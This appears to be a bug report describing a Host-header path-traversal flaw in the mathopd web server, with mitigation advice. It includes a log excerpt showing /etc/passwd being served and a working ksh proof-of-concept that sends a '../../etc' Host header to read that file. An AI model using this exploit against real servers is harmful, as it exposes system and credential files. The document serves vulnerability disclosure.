Quite easy to reproduce with ksh script attached.
HTTP Host is not checked in the DNS to see if it matches socket.
This would be expensive. Checking Host against glob would be faster.
If config could match /** or **..** in domains then it would be okay,
but it did not seem to match. "**" should match any including '/'.
However, Host is not globbed. The only fix is to have multiple
Virtual sections for each document root with Host entries for each HTTP
Host. I.e. you must use the exact HTTP Host.
Do not use Location /var/www/* as this matches any arbitrary HTTP Host.
In example you could spam users in /etc/password and say bad things
about admin.
/var/log/mathopd/access.log
> 127.0.0.1 - Sat Jul 28 09:29:39 2012 ../../etc 80
> GET /passwd - HTTP/1.1 200 60 - -
#!/usr/bin/ksh
# Superfluous carriage return may be required
my_echo() { printf "%b\r\n" "$*"; }
test -n "$2" || set -- ../../etc /passwd
exec 3<>/dev/tcp/localhost/80
{
my_echo "GET $2 HTTP/1.1"
my_echo "Host: $1"
my_echo "Connection: close"
my_echo ""
} >&3
while read -r LINE
do
printf "%s\n" "$LINE"
done <&3
